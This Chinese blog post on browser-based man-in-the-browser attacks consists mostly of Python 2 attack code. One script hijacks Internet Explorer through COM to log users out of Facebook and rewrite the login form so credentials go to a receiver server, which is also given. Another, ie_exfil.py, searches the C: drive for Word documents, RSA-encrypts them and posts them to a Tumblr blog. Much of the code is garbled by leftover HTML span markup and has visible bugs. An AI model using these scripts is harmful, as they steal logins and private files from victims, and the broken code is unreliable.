浏览器的中间人攻击

发表于 2018-05-28 更新于 2023-05-25 分类于《渗透测试与网络安全》

基于浏览器的中间人攻击

#coding=utf-8
import win32com.client
import time
import urlparse
import urllib

data_receiver = “http://localhost:8080/“
target_sites = {}
target_sites[“www.facebook.com“] = {
    “logout_url“ : None,
    “logout_form“ : “logout_form“,
    “login_form_index“ : 0,
    “owned“ : False
}
#IE浏览器类的ID号
clsid = ‘{9BA05972-F6A8-11CF-A442-00A0C90A8F39}‘
windows = win32com.client.Dispatch(clsid)
while True:
    for browser in windows:
        url = urlparse.urlparse(browser.LocationUrl)
        if url.hostname in target_sites:
            if target_sites[url.hostname][“owned“]:
                continue
            #如果有一个URL，我们可以重定向
            if target_sites[url.hostname][“logout_url“]:
                browser.Navigate(target_sites[url.hostname][“logout_url“])
                wait_for_browser(browser)
            else:
                #检索文件中的所有元素
                full_doc = browser.Document.all
                #
                for i in full_doc:
                    try:
                        #找到退出登录的表单并提交
                        if i.id == target_sites[url.hostname][“logout_url“]:
                            i.submit()
                            wait_for_browser(browser)
                    except:
                        pass
        <span style="color: #008000;">#</span><span style="color: #008000;">现在来修改登录表单</span>
        <span style="color: #0000ff;">try</span><span style="color: #000000;">:
            login_index </span>= target_sites[url.hostname][<span style="color: #800000;">"</span><span style="color: #800000;">login_form_index</span><span style="color: #800000;">"</span><span style="color: #000000;">]
            login_page </span>=<span style="color: #000000;"> urllib.quote(browser.LocationUrl)
            browser.Document.forms[login_index].action </span>= <span style="color: #800000;">"</span><span style="color: #800000;">%s%s</span><span style="color: #800000;">"</span>%<span style="color: #000000;">(data_receiver,login_page)
            target_sites[url.hostname][</span><span style="color: #800000;">"</span><span style="color: #800000;">owned</span><span style="color: #800000;">"</span>] =<span style="color: #000000;"> True
        </span><span style="color: #0000ff;">except</span><span style="color: #000000;">:
            </span><span style="color: #0000ff;">pass</span><span style="color: #000000;">
time.sleep(</span>5<span style="color: #000000;">)

def wait_for_browser(browser):
    #等待浏览器加载完一个页面
    while browser.ReadyState != 4 and browser.ReadyState != “complete“:
        time.sleep(0.1)
</span><span style="color: #0000ff;">return</span></pre>

创建接收服务器

import SimpleHTTPServer
import SocketServer
import urllib

class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    “””docstring for CredRequestHandler“””
    def do_POST(self):
        content_length = int(self.headers[‘Content-Length‘])
        creds = self.rfile.read(content_length).decode(‘utf-8‘)
        print creds
        site = self.path[1:]
        self.send_response(301)
        self.send_headers(‘Location‘,urllib.unquote(site))
        self.end_headers()
server = SocketServer.TCPServer((‘0.0.0.0‘,8080),CredRequestHandler)
server.serve_forever()

利用IE的COM组件自动化技术窃取数据

keygen.py：

#!/usr/bin/python
from Crypto.PublicKey import RSA

new_key = RSA.generate(2048,e=65537)
public_key = new_key.publickey().exportKey(“PEM“)
private_key = new_key.exportKey(“PEM“)
print public_key
print private_key

decrypto.py：

#coding=utf-8  
import zlib  
import base64  
from Crypto.PublicKey import RSA  
from Crypto.Cipher import PKCS1_OAEP  
  
private_key = “输入产生的公钥“  
rsakey = RSA.importKey(private_key)
rsakey = PKCS1_OAEP.new(rsakey)  
chunk_size = 256
offset = 0
decrypted = “”
encrypted = base64.b64decode(encrypted)  
while offset < len(encrypted):
    decrypted += rsakey.decrypted(encrypted[offset:offset+chunk_size])
    offset += chunk_size  
#解压负载  
plaintext = zlib.decompress(decrypted)  
print plaintext

这段代码用于将赖在tumblr的编码文件进行base64解码，从而形成原始的明文字符串，最后进行负载解压。

ie_exfil.py：

#coding=utf-8
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

doc_type = “.doc“
username = “lyshark“
password = “123123123“
public_key = “公钥“
def wait_for_browser(browser):
    #等待浏览器加载完一个页面
    while browser.ReadyState != 4 and browser.ReadyState != “complete“:
        time.sleep(0.1)
</span><span style="color: #0000ff;">return</span>

def encrypt_string(plaintext):
    chunk_size = 256
    print “Compressing: %d bytes“%len(plaintext)
    plaintext = zlib.compress(plaintext)
</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Encrypting %d bytes</span><span style="color: #800000;">"</span>%<span style="color: #000000;">len(plaintext)

rsakey </span>=<span style="color: #000000;"> RSA.importKey(public_key)
rsakey </span>=<span style="color: #000000;"> PKCS1_OAEP.new(rsakey)

encrypted </span>= <span style="color: #800000;">""</span><span style="color: #000000;">
offset </span>=<span style="color: #000000;"> 0

</span><span style="color: #0000ff;">while</span> offset &lt;<span style="color: #000000;"> len(plaintext):
    chunk </span>= plaintext[offset:offset+<span style="color: #000000;">chunk_size]

    </span><span style="color: #0000ff;">if</span> len(chunk) % chunk_size !=<span style="color: #000000;"> 0:
        chunk </span>+= <span style="color: #800000;">"</span> <span style="color: #800000;">"</span> * (chunk_size -<span style="color: #000000;"> len(chunk))

    encrypted </span>+=<span style="color: #000000;"> rsakey.encrypt(chunk)
    offset </span>+=<span style="color: #000000;"> chunk_size

encrypted </span>= encrypted.encode(<span style="color: #800000;">"</span><span style="color: #800000;">base64</span><span style="color: #800000;">"</span><span style="color: #000000;">)

</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Base64 encoded crypto: %d</span><span style="color: #800000;">"</span>%<span style="color: #000000;">len(encrypted)

</span><span style="color: #0000ff;">return</span><span style="color: #000000;"> encrypted

def encrypt_post(filename):
    #打开并读取文件
    fd = open(filename,“rb“)
    contents = fd.read()
    fd.close()
encrypted_title </span>=<span style="color: #000000;"> encrypt_string(filename)
encrypted_body </span>=<span style="color: #000000;"> encrypt_string(contents)

</span><span style="color: #0000ff;">return</span><span style="color: #000000;"> encrypted_title,encrypted_body

def random_sleep():
    time.sleep(random.randint(5,10))
    return
def login_to_tumblr(ie):
    #解析文档中的所有元素
    full_doc = ie.Document.all
</span><span style="color: #008000;">#</span><span style="color: #008000;">迭代每个元素来查找登录表单</span>
<span style="color: #0000ff;">for</span> i <span style="color: #0000ff;">in</span><span style="color: #000000;"> full_doc:
    </span><span style="color: #0000ff;">if</span> i.id == <span style="color: #800000;">"</span><span style="color: #800000;">signup_email</span><span style="color: #800000;">"</span><span style="color: #000000;">:
        i.setAttribute(</span><span style="color: #800000;">"</span><span style="color: #800000;">value</span><span style="color: #800000;">"</span><span style="color: #000000;">,username)
    </span><span style="color: #0000ff;">elif</span> i.id == <span style="color: #800000;">"</span><span style="color: #800000;">signup_password</span><span style="color: #800000;">"</span><span style="color: #000000;">:
        i.setAttribute(</span><span style="color: #800000;">"</span><span style="color: #800000;">value</span><span style="color: #800000;">"</span><span style="color: #000000;">,password)

random_sleep()

</span><span style="color: #0000ff;">try</span><span style="color: #000000;">:
    </span><span style="color: #008000;">#</span><span style="color: #008000;">你会遇到不同的登陆主页</span>
    <span style="color: #0000ff;">if</span>  ie.Document.forms[0].id == <span style="color: #800000;">"</span><span style="color: #800000;">signup_form</span><span style="color: #800000;">"</span><span style="color: #000000;">:
        ie.Document.forms[0].submit()
    </span><span style="color: #0000ff;">else</span><span style="color: #000000;">:
        ie.Document.forms[</span>1<span style="color: #000000;">].submit()
</span><span style="color: #0000ff;">except</span><span style="color: #000000;"> IndexError, e:
    </span><span style="color: #0000ff;">pass</span><span style="color: #000000;">

random_sleep()

</span><span style="color: #008000;">#</span><span style="color: #008000;">登陆表单是登录页面中的第二个表单</span>

    wait_for_browser(ie)
</span><span style="color: #0000ff;">return</span>

def post_to_tumblr(ie,title,post):
    full_doc = ie.Document.all
</span><span style="color: #0000ff;">for</span> i <span style="color: #0000ff;">in</span><span style="color: #000000;"> full_doc:
    </span><span style="color: #0000ff;">if</span> i.id == <span style="color: #800000;">"</span><span style="color: #800000;">post_one</span><span style="color: #800000;">"</span><span style="color: #000000;">:
        i.setAttribute(</span><span style="color: #800000;">"</span><span style="color: #800000;">value</span><span style="color: #800000;">"</span><span style="color: #000000;">,title)
        title_box </span>=<span style="color: #000000;"> i
        i.focus()
    </span><span style="color: #0000ff;">elif</span> i.id == <span style="color: #800000;">"</span><span style="color: #800000;">post_two</span><span style="color: #800000;">"</span><span style="color: #000000;">:
        i.setAttribute(</span><span style="color: #800000;">"</span><span style="color: #800000;">innerHTML</span><span style="color: #800000;">"</span><span style="color: #000000;">,post)
        </span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Set text area</span><span style="color: #800000;">"</span><span style="color: #000000;">
        i.focus()
    </span><span style="color: #0000ff;">elif</span> i.id == <span style="color: #800000;">"</span><span style="color: #800000;">create_post</span><span style="color: #800000;">"</span><span style="color: #000000;">:
        </span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Found post button</span><span style="color: #800000;">"</span><span style="color: #000000;">
        post_form </span>=<span style="color: #000000;"> i
        i.focus()

</span><span style="color: #008000;">#</span><span style="color: #008000;">将浏览器的焦点从输入主体内容的窗口上移开</span>

    random_sleep()
    title_box.focus()
    random_sleep()
</span><span style="color: #008000;">#</span><span style="color: #008000;">提交表单</span>

    post_form.children[0].click()
    wait_for_browser(ie)
random_sleep()

</span><span style="color: #0000ff;">return</span>

def exfiltrate(document_path):
    ie = win32com.client.Dispatch(“InternetExplorer.Application“)
    ie.Visible = 1
<span style="color: #008000;">#</span><span style="color: #008000;">访问tumblr站点并登录</span>
ie.Navigate(<span style="color: #800000;">"</span><span style="color: #800000;">https://www.tumblr.com/login</span><span style="color: #800000;">"</span><span style="color: #000000;">)
wait_for_browser(ie)

</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Logging in...</span><span style="color: #800000;">"</span><span style="color: #000000;">
login_to_tumblr(ie)
</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Logged in...navigating</span><span style="color: #800000;">"</span><span style="color: #000000;">

ie.Navigate(</span><span style="color: #800000;">"</span><span style="color: #800000;">https://www.tumblr.com/new/text</span><span style="color: #800000;">"</span><span style="color: #000000;">)
wait_for_browser(ie)

</span><span style="color: #008000;">#</span><span style="color: #008000;">加密文件</span>
title,body =<span style="color: #000000;"> encrypt_post(document_path)

</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Creating new post...</span><span style="color: #800000;">"</span><span style="color: #000000;">
post_to_tumblr(ie,title,body)
</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">Posted!</span><span style="color: #800000;">"</span>

<span style="color: #008000;">#</span><span style="color: #008000;">销毁IE实例</span>

    ie.Quit()
    ie = None
</span><span style="color: #0000ff;">return</span>

#用户文档检索的循环
#注意：以下这段代码的第一行没有&ldquo;tab&rdquo;缩进
for parent,directories,filenames in os.walk(“C:\“):
    for filename in fnmatch.filter(filenames,“*%s“%doc_type):
        document_path = os.path.join(parent,filename)
        print “Found: %s“%document_path
        exfiltrate(document_path)
        raw_input(“Continue?“)

代码用于捕获本地文件系统中的Word文档，并利用公钥对其进行加密，然后自动启动进程将加密的文档提交到一个位于tumblr.com站点的博客上